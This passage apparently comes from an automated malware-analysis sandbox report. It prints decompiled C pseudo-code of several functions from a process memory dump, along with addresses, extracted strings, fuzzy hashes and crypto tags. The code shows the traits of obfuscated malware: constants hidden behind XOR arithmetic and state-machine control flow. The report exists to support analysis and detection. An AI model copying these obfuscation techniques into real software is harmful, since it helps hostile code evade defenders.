				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E00258C8F(_t189);
				_t217 = _v28 + E00258C8F(_t189) % _v52;
				_t184 = _v20 + E00258C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E0024D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}

0x002483a0
0x002483aa
0x002483b2
0x002483b7
0x002483bf
0x002483d1
0x002483d5
0x002483dc
0x002483df
0x002483e3
0x002483e8
0x002483f0
0x002483fd
0x00248401
0x00248406
0x0024840e
0x00248416
0x0024841e
0x00248426
0x0024842e
0x00248436
0x0024843e
0x00248446
0x0024844e
0x00248456
0x0024845e
0x00248466
0x0024846e
0x00248476
0x0024847e
0x00248483
0x00248490
0x00248494
0x0024849c
0x002484a8
0x002484ad
0x002484b3
0x002484bb
0x002484c3
0x002484cb
0x002484d0
0x002484d8
0x002484e0
0x002484e8
0x002484f0
0x002484f8
0x00248500
0x00248508
0x00248510
0x00248515
0x0024851d
0x00248525
0x00248531
0x00248536
0x0024853c
0x00248544
0x00248551
0x00248552
0x0024855c
0x00248560
0x00248568
0x00248570
0x00248578
0x00248580
0x00248584
0x0024858c
0x002485a1
0x002485c2
0x002485d9
0x002485dd
0x002485e2
0x002485e4
0x002485e6
0x002485ee
0x002485f0
0x002485f2
0x002485f5
0x0024860f
0x00248619
0x00248623

Strings

KB, xrefs: 00248500
Qv, xrefs: 0024853C
H', xrefs: 002483E8
o9, xrefs: 00248584
BQ{*, xrefs: 0024841E

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: BQ{*$H'$KB$Qv$o9
API String ID: 0-3657823386
Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction ID: fa7f601bf35b379f450afb65332a16de8e1feea65a1091c241486457d8090b65
Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction Fuzzy Hash: 3B6101711093419FD348CF25D58A50FBBE1FBC8748F408A1DF1DAA6260D7B9DA198F8A

Uniqueness

Uniqueness Score: -1.00%

Function 00245B79, Relevance: 5.2, Strings: 4, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00245B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E0025023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E00248736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E00252674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E0024F536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E00248736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E0024F536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}

0x00245b79
0x00245b79
0x00245b80
0x00245b84
0x00245b88
0x00245b92
0x00245b99
0x00245ba1
0x00245ba9
0x00245bae
0x00245bb6
0x00245bbe
0x00245bc6
0x00245bce
0x00245bd6
0x00245bde
0x00245be7
0x00245beb
0x00245bf0
0x00245bfd
0x00245c02
0x00245c08
0x00245c10
0x00245c18
0x00245c1d
0x00245c25
0x00245c2d
0x00245c35
0x00245c3a
0x00245c47
0x00245c48
0x00245c4c
0x00245c54
0x00245c5c
0x00245c61
0x00245c69
0x00245c6e
0x00245c76
0x00245c7e
0x00245c86
0x00245c8e
0x00245c96
0x00245c9e
0x00245ca6
0x00245cae
0x00245cb6
0x00245cbe
0x00245cc6
0x00245cce
0x00245cd6
0x00245cde
0x00245ce6
0x00245cee
0x00245cf6
0x00245cfb
0x00245d03
0x00245d11
0x00245d15
0x00245d1d
0x00245d25
0x00245d32
0x00245d36
0x00245d3b
0x00245d43
0x00245d4d
0x00245d5b
0x00245d60
0x00245d66
0x00245d6e
0x00245d76
0x00245d7e
0x00245d82
0x00245d8a
0x00245d92
0x00245d9a
0x00245da2
0x00245daf
0x00245db0
0x00245db4
0x00245db8
0x00245dbc
0x00245dc4
0x00245dcc
0x00245dda
0x00245dde
0x00245de7
0x00245deb
0x00245df3
0x00245df7
0x00245e09
0x00245e66
0x00245e68
0x00245e6b
0x00245e71
0x00245f29
0x00000000
0x00245e77
0x00245e77
0x00245e7d
0x00000000
0x00245e83
0x00245e87
0x00245e89
0x00245e8d
0x00245e8f
0x00000000
0x00245e91
0x00245e95
0x00245ea0
0x00245ea1
0x00245ea2
0x00245eab
0x00245eb1
0x00000000
0x00245eb3
0x00245ec6
0x00245ed8
0x00245edd
0x00245edf
0x00245ee2
0x00245ee9
0x00245eec
0x00245ef0
0x00245ef4
0x00000000
0x00245ef6
0x00000000
0x00245ef6
0x00245ef4
0x00245eb1
0x00245e8f
0x00245e7d
0x00245e0b
0x00245e11
0x00245f00
0x00245f06
0x00000000
0x00000000
0x00000000
0x00000000
0x00245e17
0x00245e1b
0x00245e28
0x00245e29
0x00245e2c
0x00245e31
0x00245e37
0x00245f0c
0x00245f0c
0x00245f12
0x00245f2d
0x00245f3a
0x00245f14
0x00245f14
0x00245f1a
0x00245f1c
0x00245f1c
0x00245e3d
0x00245e3d
0x00245e41
0x00245e43
0x00245e43
0x00245e47
0x00000000
0x00245e47
0x00245e37
0x00245e11
0x00245f28
0x00245f28
0x00245efb
0x00000000

Strings

z#, xrefs: 00245CFB
b-, xrefs: 00245D66
l', xrefs: 00245BBE
bA, xrefs: 00245C76

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: b-$bA$l'$z#
API String ID: 0-3285866504
Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction ID: 7cd659052618a7d1f255f9efa3360ead091d7ea351b3c981e201ba791bf88e6c
Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction Fuzzy Hash: 3DA130B15187829FD368CF69C48980FBBE1FBC5718F548A1DF595862A0D3B4DA098F83

Uniqueness

Uniqueness Score: -1.00%

Function 002480BA, Relevance: 5.1, Strings: 4, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E002480BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E0024602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E0025360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E00248736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E002550F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E002561B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E00247998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}

0x002480c0
0x002480c8
0x002480c9
0x002480d0
0x002480d3
0x002480d4
0x002480d9
0x002480e1
0x002480e4
0x002480eb
0x002480f3
0x002480f8
0x0024810c
0x0024810d
0x00248111
0x00248116
0x0024811e
0x00248126
0x0024812a
0x00248132
0x0024813a
0x00248142
0x0024814a
0x00248152
0x00248160
0x00248164
0x0024816c
0x00248179
0x0024817d
0x00248185
0x0024818d
0x00248192
0x00248197
0x0024819f
0x002481a7
0x002481ac
0x002481b4
0x002481bc
0x002481c4
0x002481cc
0x002481d4
0x002481dc
0x002481e4
0x002481ec
0x002481f4
0x002481f9
0x00248201
0x0024820e
0x00248212
0x0024821c
0x0024821c
0x0024822e
0x002482c8
0x002482cd
0x002482d0
0x00000000
0x00248234
0x0024823a
0x0024829d
0x0024829e
0x002482a2
0x002482a7
0x002482ab
0x002482ad
0x002482af
0x00000000
0x002482af
0x0024823c
0x0024823e
0x00248282
0x00248287
0x0024828a
0x00000000
0x00248240
0x00248246
0x00248267
0x0024826a
0x00000000
0x00248248
0x0024824e
0x00000000
0x00248254
0x00248254
0x00248256
0x0024825b
0x00000000
0x0024825b
0x0024824e
0x00248246
0x0024823e
0x0024823a
0x00000000
0x0024822e
0x002482ef
0x002482f4
0x002482f7
0x002482fc
0x002482fc
0x002482fc
0x00248309
0x0024830b
0x0024830f
0x0024830f
0x00248316

Strings

n(, xrefs: 00248201
+%, xrefs: 00248240
+%, xrefs: 00248256
XE, xrefs: 0024819F

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +%$+%$XE$n(
API String ID: 0-3838449085
Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction ID: 9dd5ac5f265ffab2ec4f25ced9b3722044155b592d8437cf6a9b25bf202ab8a2
Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction Fuzzy Hash: F85164701197429FC348DF20C88982FBBE1BFC4748F505A2DF586962A0DBB18A59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00258D1C, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00258D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E002585BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E0024E29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E00258D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E00248736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E00246636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

0x00258d1f
0x00258d28
0x00258d2f
0x00258d3f
0x00258d44
0x00258d4a
0x00258d52
0x00258d5a
0x00258d5f
0x00258d67
0x00258d6f
0x00258d77
0x00258d7f
0x00258d87
0x00258d8f
0x00258d97
0x00258d9f
0x00258da7
0x00258daf
0x00258db7
0x00258dbf
0x00258dc7
0x00258dd3
0x00258dd8
0x00258dde
0x00258de6
0x00258dee
0x00258dfa
0x00258dff
0x00258e09
0x00258e0c
0x00258e10
0x00258e18
0x00258e20
0x00258e28
0x00258e30
0x00258e38
0x00258e40
0x00258e45
0x00258e51
0x00258e56
0x00258e5a
0x00258e5c
0x00258e64
0x00258e6c
0x00258e74
0x00258e79
0x00258e7c
0x00258e92
0x00258e94
0x00258e9c
0x00258ea2
0x00258ea9
0x00258eaf
0x00258eb5
0x00258ebe
0x00258ecc
0x00258ecd
0x00258ed8
0x00258ede
0x00258ee5
0x00258ef0
0x00258ef5
0x00258efc
0x00258f02
0x00258f02
0x00258ede
0x00258ebe
0x00258ea9
0x00258f0e

Strings

oMt, xrefs: 00258DA7
9*, xrefs: 00258D67
4A3, xrefs: 00258D5F
/, xrefs: 00258E38

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /$4A3$9*$oMt
API String ID: 0-1186868077
Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction ID: b37d2ca0ffa8f90a641c84c882896629d48a6e65570646e7535eaa21d39c822b
Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction Fuzzy Hash: FB516671208342DFD358CF25C48A81BFBE1FB98318F204A1CF49696260D7B4DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00242A30, Relevance: 5.1, Strings: 4, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00242A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E00252349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E0024F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E00252025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}

0x00242a36
0x00242a3f
0x00242a46
0x00242a53
0x00242a58
0x00242a5d
0x00242a64
0x00242a6f
0x00242a72
0x00242a75
0x00242a78
0x00242a7f
0x00242a86
0x00242a8d
0x00242a94
0x00242a9b
0x00242aa6
0x00242aa9
0x00242ab0
0x00242ab7
0x00242abe
0x00242aca
0x00242acb
0x00242ad0
0x00242adf
0x00242ae2
0x00242ae9
0x00242af5
0x00242af8
0x00242aff
0x00242b06
0x00242b0d
0x00242b14
0x00242b1b
0x00242b22
0x00242b26
0x00242b2a
0x00242b31
0x00242b38
0x00242b3f
0x00242b46
0x00242b4d
0x00242b54
0x00242b58
0x00242b5f
0x00242b66
0x00242b6d
0x00242b77
0x00242b7a
0x00242b7c
0x00242b8f
0x00242b9d
0x00242bb2
0x00242bbe
0x00242bcd
0x00242bd3
0x00242bda

Strings

^, xrefs: 00242A86
s, xrefs: 00242A9B
18, xrefs: 00242B66
+/F, xrefs: 00242A78

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +/F$18$^$s
API String ID: 0-1171060364
Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction ID: e90e494bb3e77f8d583b409794df6540a3f606f07ff222dcf21acbf5e8665479
